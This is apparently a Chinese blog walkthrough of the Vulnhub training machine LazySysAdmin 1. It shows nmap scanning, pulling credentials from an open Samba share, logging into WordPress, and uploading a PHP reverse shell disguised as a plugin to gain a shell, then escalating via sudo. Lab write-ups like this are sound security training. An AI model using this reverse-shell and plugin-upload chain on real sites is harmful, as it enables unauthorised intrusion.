Vulnhub靶机:LAZYSYSADMIN_ 1

目录

介绍

系列:LazySysAdmin(此系列共1台)

发布日期:2017 年 9 月 20 日

难度:初级

运行环境:VMware Workstation

目标:取得Root权限

学习:

  • samba敏感信息泄露
  • wordpress挂马

靶机地址:https://www.vulnhub.com/entry/lazysysadmin-1,205/

信息收集

netdiscover主机发现

shell 复制代码
sudo netdiscover -i eth0 -r 192.168.229.0/24

主机信息探测

发现SSH运行在777端口

shell 复制代码
nmap -p- 192.168.229.144
nmap -p 22,80,139,445,3306,6667 -A 192.168.229.144
nmap -p 22,80,139,445,3306,6667 --script=vuln 192.168.229.144

测试 samba 安全

发现了一个有只读权限的共享目录,使用空口令登录进去。结果发现了很多文件目录。

shell 复制代码
smbmap -H 192.168.229.144
smbclient //192.168.229.144/share$

使用get,把自己感兴趣的文件下载下来

通过配置文件找到一个账号密码:Admin/TogieMYSQL12345^^

此外还有一个密码:12345

登录网站

网站首页是一个静态页面,没什么有价值的信息。

简单的目录爆破,发现了wordpress:dirsearch -u http://192.168.229.144/ --full-url -x 404,403

页面上的内容一直在告诉我们,他叫togie,那接下来就试试登录吧。

访问默认后台地址:http://192.168.229.144/wordpress/wp-admin

使用Admin/TogieMYSQL12345^^登录成功

攻击者往往通过插件功能反弹shell,下面开始演示WordPress拿shell的一个流程

zip自解压拿webshell

  1. 下载反弹shell的文件

https://pentestmonkey.net/tools/web-shells/php-reverse-shell

shell 复制代码
wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
gunzip php-reverse-shell-1.0.tar.gz
tar xvf php-reverse-shell-1.0.tar
cp php-reverse-shell-1.0/php-reverse-shell.php ./
vim php-reverse-shell.php
zip sh.zip php-reverse-shell.php

这个文件,kali已经内置了,位于:/usr/share/webshells/php/php-reverse-shell.php

  1. 编辑文件

设置反弹shell的地址和端口

编辑虚假的插件的头文件,这一步可做可不做。

  1. 安装插件

显示安装成功

  1. 获取shell
shell 复制代码
http://192.168.229.144/wordpress/wp-content/plugins/sh/php-reverse-shell.php

提权

首先修复一下shell:

shell 复制代码
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-color

发现可以提权到togie,然后就是sudo提权了。

相关推荐
NickWilde2331 个月前
vulnhub靶机tomato记录
网络安全·vulnhub·本地文件包含·靶机测试
一纸-荒芜1 个月前
【Raven2靶场渗透】
web安全·网络安全·靶场·渗透·vulnhub
RrEeSsEeTt2 个月前
Vulnhub靶场DC-9练习
linux·web安全·网络安全·渗透测试·vulnhub·提权·sql注入
RrEeSsEeTt2 个月前
Vulnhub靶场DC-7练习
linux·web安全·网络安全·kali·vulnhub·提权
(时光煮雨)3 个月前
vuInhub靶场实战系列--Kioptrix Level #1
网络安全·渗透测试·vulnhub·kioptrixlevel#1
(时光煮雨)3 个月前
vuInhub靶场实战系列--Kioptrix Level #2
linux·web安全·网络安全·渗透测试·vulnhub
(时光煮雨)4 个月前
vuInhub靶场实战系列--prime:1
linux·web安全·网络安全·渗透测试·vulnhub·安全性测试·威胁分析
黑战士安全4 个月前
靶机Moonraker_1练习报告
渗透测试·vulnhub
admin and root5 个月前
Weblogic任意文件上传漏洞(CVE-2018-2894)漏洞复现(基于vulhub)
web安全·网络安全·vulnhub·ctf·weblogic
admin and root5 个月前
[VulnHub靶机渗透] pWnOS 2.0
测试工具·web安全·网络安全·渗透测试·vulnhub·ctf·代码